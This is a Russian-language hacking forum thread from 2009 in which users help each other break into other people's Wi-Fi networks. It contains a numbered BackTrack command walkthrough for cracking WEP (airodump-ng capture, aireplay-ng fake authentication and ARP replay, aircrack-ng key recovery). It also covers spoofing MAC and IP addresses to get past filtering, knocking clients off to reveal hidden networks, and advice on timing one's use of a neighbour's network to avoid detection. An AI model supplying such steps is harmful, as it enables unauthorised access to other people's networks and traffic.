ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Беспроводные технологии/Wi-Fi/Wardriving (https://forum.antichat.io/forumdisplay.php?f=113)
-   -   [Wi-Fi, BT] Задай вопрос - получи ответ! (https://forum.antichat.io/showthread.php?t=48818)

boykent 16.06.2009 00:06

ALEX 87
у меня такая же фигня была не мог подключится к точке потому что скрытая и без шифрования, и рядом неодного клиента,но используя CommView собрал Beacon пакетов гдето 40000 и имя сети само появилось! а подключаюсь с помощью проги WiFi Hopper очень удобная ,попробуй мож получится!

boykent 16.06.2009 10:49

Semby68
Добрый день.Попробовал последним способом,тем что ты ссылку дал с видео,неполучается!Ничего не могу понять,собираю пакеты причём разными способами aircrack после подбора мне выдаёт Failed.Next try with 10000 IVs. и чем больше тем больше он мне пишет IVs.Вчера собрал 5000000 дата пакетов,и нечего не получилось!Может что не так делаю?Хотя всё делаю как в описаниях по подбору!Может,просто нельзя подобрать ключ к точке,так пробовал не только с одной и ничего! И ещё вопросик,как можно поменять свой мак адрес и где это делается?

x-demon 16.06.2009 17:18

Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?

x-demon 16.06.2009 17:20

boykent, а ты точно WEP ломаешь? Если там WPA/WPA2, то атака только по словарю

popoffka 16.06.2009 20:07

Здравствуйте!
Я владелец лэптопа Acer Extensa 5220 с wifi модулём Broadcom 4312 и WinXP SP3.
Как мне перевести wifi модуль в т.н. "monitor mode" и какой программой ловить пакеты, проходящие через сеть, к которой я подключен?

ALEX_87 17.06.2009 14:25

Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.

boykent 17.06.2009 18:47

Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так;
BSSID 00:40:96:55:D8:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.

seteboz 18.06.2009 15:42

Цитата:

Сообщение от boykent
Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так;
BSSID 00:40:96:55:D8:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.

Попробуй знаешь что, когда пускаешь aircrack-ng опцию -n поставь 64 бита (или 128, если ставишь 64). У мя такой косяк был ;)
Вообще говоря, даже если ты пользуешся не BackTrck'ом вся проблема в длине взамываемого ключа - у тебя выбрана неверно.

seteboz 18.06.2009 15:45

Цитата:

Сообщение от x-demon
Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?

Да всё верно: -100 это п..дец как далеко
-0, 01 это п..дец как близко :)

seteboz 18.06.2009 16:16

Цитата:

Сообщение от ALEX_87
Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.

Чавойто Broadcom для мониторинга не пригоден-то, ась? Очень даже: airmon-ng start wlan0 и фперёд))

boykent 18.06.2009 17:02

seteboz
А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше?

seteboz 18.06.2009 17:13

Цитата:

Сообщение от boykent
seteboz
А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше?

Во-первихъ, aircrack-ng --help. А вообще нет, не автоматом, есть ключ команды aircrack-ng "-n 64" (для ключа 64 бит). Вот пример:
aircrack-ng -n 64 -b [bssid-сети вайфай] [filename- файл с перехваченными пакетами]-01.cap

http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
По этой ссылке подробная инструкция по взлому WEP в BackTrack 3.
Всё проверено всё работает. Возникнут вопросы пиши

boykent 18.06.2009 23:01

Уважаемый seteboz!
Попробовал я её сломать с помощью вашей подсказки и по ссылке смотрел,и так и так пробовал,ничего не получилось!Дело в том,что эта точка она скрытая и когда я ловлю с неё пакеты сначало узнаю название её потом как не странно она с WEP WEP переименовывается в WPA WEP шифрование!Рядом есть ещё точки у них шифрование такое WPA2 TKIP ну или чтото в этом роде!Может быть что та точка которую я хочу поломать скрывает не только своё имя но и шифрование с wep превращается в wpa!Какие есть мысли? А где можно хороших словарей скачать,а то меня уже стали окружать одни только WPA?И вообще,есть кто на этом форуме,кто смог изьять ключик на WPA? или ещё мало кто смог преодалеть такую защиту?

Semby68 19.06.2009 03:51

Цитата:

Сообщение от boykent
Semby68
Добрый день.Попробовал последним способом,тем что ты ссылку дал с видео,неполучается!Ничего не могу понять,собираю пакеты причём разными способами aircrack после подбора мне выдаёт Failed.Next try with 10000 IVs. и чем больше тем больше он мне пишет IVs.Вчера собрал 5000000 дата пакетов,и нечего не получилось!Может что не так делаю?Хотя всё делаю как в описаниях по подбору!Может,просто нельзя подобрать ключ к точке,так пробовал не только с одной и ничего! И ещё вопросик,как можно поменять свой мак адрес и где это делается?

я ломаю WEP простым способом !

BT-3

1. #airmon-ng

2. #airmon-ng stop rausb0

{ rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon }

останавливаю Wi-fi карту для смены мак адреса .

3. # ifconfig rausb0 down

я пишу этот { 00:55:67:89:55:22 }

4. # macchanger --mac 00:55:67:89:55:22 rausb0

запускаем

5. # airmon-ng start rausb0

видим (monitor mode enabled on rausb0 )

Теперь сканим доступные беспроводные сети, использующие шфрование WEP


6 .# airodump-ng rausb0
остановить airodump клавишами Ctrl + С

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0

атакуем точку и комп

8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

запускаем дишифратор

9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

посе сбора 20 пакетов DATA запускаем aircrack

10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap

и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай !

удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS #

И ещо , купил адаптор USB WI-FI мощный , вот ссылка

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

x-demon 19.06.2009 12:06

>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>

Semby68 19.06.2009 13:03

Цитата:

Сообщение от x-demon
>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>


я так понял { iwconfig rausb0 channel <n> } это настройка скорости между точкой и моей картой .

а атаку , p0841 , попробую ,
благодарю !# Semby68 #

boykent 19.06.2009 14:04

Semby68
x-demon
ОГРОМНОЕ СПАСИБО!!!!!! наконец получилось! я вместо своего мак адреса подставил мак клиента и пакеты посыпались горой в 100 раз быстрее!Удачи вам и процветанию этому сайту!
НО ТЕПЕРЬ ВОЗНИКЛА ДРУГАЯ ПРОБЛЕМА!Как подключится к этой точке она же скрытая! использую WIFI Hopper!или есть др.софт для подключения к скрытым точкам?

x-demon 19.06.2009 16:45

Скрытую точку обнаружить просто. Надо запустить airodump-ng на канале, на котором висит точка, и ждать пока кто то подключится. Либо вышибить уже подключенного клиента. Как только он подключится - имя точки будет вскрыто.

boykent 19.06.2009 18:46

Уважаемый x-demon
Вообщем получилось прописать имя и ключ ,но всё равно не могу подключится видимо там на точке стоит MAC или Ip фильтрация адресов!Может такое быть и как от этого исбавится,как мне изменить MAC и IP адрес чтоб подключится? А как можно узнать ip адрес точки доступа к которой я хочу подключится? и надо же ip знать?

x-demon 19.06.2009 20:13

macchanger --mac 11:22:33:44:55:66 wlan0 - значения подставить свои. Нет, если на точке включен DHCP. Если не включен... можно попробовать узнать пул IP адресов с помощью kismet

razb 19.06.2009 23:31

Можно и средствами ifconfig'a
Код:

ifconfig <iface_name> hw ether XX:XX:XX:XX:XX:XX

Haruka 20.06.2009 14:27

я так и не понял как MAC менять. Вот что я делаю:
# airmon-ng
Допустип выдает ath0. Далее останавливаю:
# airmon-ng stop ath0
И пытаюсь сменить MAC:
# macchanger --mac 00:11:22:33:44:55 ath0
А оно мне типа нет такого устройства. Что я делаю не так?

razb 20.06.2009 14:40

Блин что там сложного?

Код:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:555
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0


Kortez 24.06.2009 05:07

При работе с BT3 или BT4 не происходит сбор #data пакетов, в чём может быть причина? beacon и pockets только собираются.


edimax ew-7318USg

igor29 24.06.2009 09:06

Всем привет возникла небольшая проблемка по подключению к сети сеть сама по себе открытая но стоит фильтрация по macу и вроде бы все легко (заменить свой адресс на другой зареганный в сети) но при замене к точке хрен подключишься она меня просто игнорит адаптер edimax 7128g (чип rt2501)

boykent 24.06.2009 11:12

Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто?

igor29
Попробуй IP адрес у себя прописать,у меня была такая проблема!сначала ключик добыл с помощю ВТ3,а потом прописал мак его клиента, не мог подключится!а потом думаю дай я с ip адресами побалуюсь,прописал в насторойках wifi карты 192.168.1.2,и всё стало мне счастье!сейчас сижу на точке,правда пока клиент в сети я не могу подключится,но он редко бывает!Так что удачи!

Kortez 24.06.2009 12:08

[QUOTE=boykent]Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто?

Точно, протестировал на своей сети, поддключил ноутбук и дата покеты пошли. А как быть с чужими сетями которые молчат? как понимаю их надо как-то разговорить, если не ошибаюсь, этим занимается aireplay-ng ?при помощи инъекций

asusm2ne 24.06.2009 12:24

Добрый день! Уважаемые колдуны, вопросов много, начну с главного (ибо сегодня нужно определится) Вобщем купил точку доступа Planet WAP-4036, но нудобно без хаба, хочу сделать чтоб инет раздавало без взаимодействия компа (сервака)... Вот думаю сменить на Planet WAP-4035 со строеным хабом! Вопрос такой: какую точку лучше взять, интересует дальность радиуса действия и стабильность работы! Или порекомендуйте других производителей: только D-link, TP-link или из Planet что то иное! Другие фирмы не предлагать, ибо у нас их почти нет и цена кусючая! Заранее спс

igor29 24.06.2009 14:05

boykent
спасибо за совет сменил mac и ip но ниче не изменилось

boykent 24.06.2009 14:56

igor29
а ты не пробовал баловаться последними цифрами ip адреса? Пример:
192.168._._ , менять последнии цифры!У меня сначало тоже ничего не шло но потом попал,и не получалось подключится когда клиент,хозяин этого мак адреса был подключён!может в этом причина?!

boykent 24.06.2009 15:06

Kortez
Чуть выше описовал взлом Semby68,за что ему спасибо!Попробуй этим способом,там можно заставить точку с помощью aireplay-ng отдавать пакеты твоему мак адресу!
Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) Короче, вот ссылка там всё увидешь: http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
А ещё, что я делал чтоб пакеты быстрей собирались но это если есть хотябы один клиент возле точки прописывал вместо своего МАК адреса мак адрес клиента!И скорость сбора увеличивалась раза в два, в три!!!

igor29 24.06.2009 18:26

boykent
Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool:

boykent 24.06.2009 20:55

Цитата:

Сообщение от igor29
boykent
Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool:

Предупрежу тебя!Незлоупотребляй подключением или иначе тебя заблочат т.е., клиент которого ты используешь мак адрес в то время пока ты подключён не сможет подключится и тогда поменяет мак адре или того хуже зашифруют сетку!Используй подключение тогда когда клиент отсутствует, а лучше запомни время когда тебе можно подключится!Удачи и всех благ!

igor29 24.06.2009 22:07

boykent
спасиб за предупреждение уж за этим прослежу :)

Kortez 25.06.2009 03:48

Цитата:

Сообщение от boykent
Kortez
Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) !

После того, как я прописываю эту команду, выдёт мол процесс unsuccesful.

t_serega 25.06.2009 08:25

Поделитесь возможным успешным опытом установки и запуска Kismet-2009-06-R1 (берется с сайта http://www.kismetwireless.net/download.shtml) в Ubuntu 9.04
Я запаривался настраивать процессы kismet_server и kismet_client :-(

boykent 25.06.2009 11:42

Цитата:

Сообщение от Kortez
После того, как я прописываю эту команду, выдёт мол процесс unsuccesful.

попробуй без ( -е ESSID точки ). Дело в том что я пробовал сначало без него и ничего,а потом прописал ESSID и всё заработало! Ты ж делаешь всё по инструкции?Как описано здесь http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 ?

Kortez 25.06.2009 14:54

Цитата:

Сообщение от boykent
попробуй без ( -е ESSID точки ). Дело в том что я пробовал сначало без него и ничего,а потом прописал ESSID и всё заработало! Ты ж делаешь всё по инструкции?Как описано здесь http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 ?

Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0
06:49:59 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11

06:49:59 Sending Authentication Request (Open System) [ACK]
06:49:59 Authentication successful
06:49:59 Sending Association Request [ACK]
06:49:59 Association successful :-) (AID: 1)
root@bt:~# aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
06:51:23 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11
Saving ARP requests in replay_arp-0625-065123.cap
You should also start airodump-ng to capture replies.
^Cad 4153 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)


Но data покеты всё равно не собираются...хмм

boykent 25.06.2009 16:42

Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0


Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло!

Kortez 25.06.2009 17:39

Цитата:

Сообщение от boykent
Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0


Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло!

А как определить, есть ли рядом с ним клиент?и как узнать bssid клиента?


Время: 16:46